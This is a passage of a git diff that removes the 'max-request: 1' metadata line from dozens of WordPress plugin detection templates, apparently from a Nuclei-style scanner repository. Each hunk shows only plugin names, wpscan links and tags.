@@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml 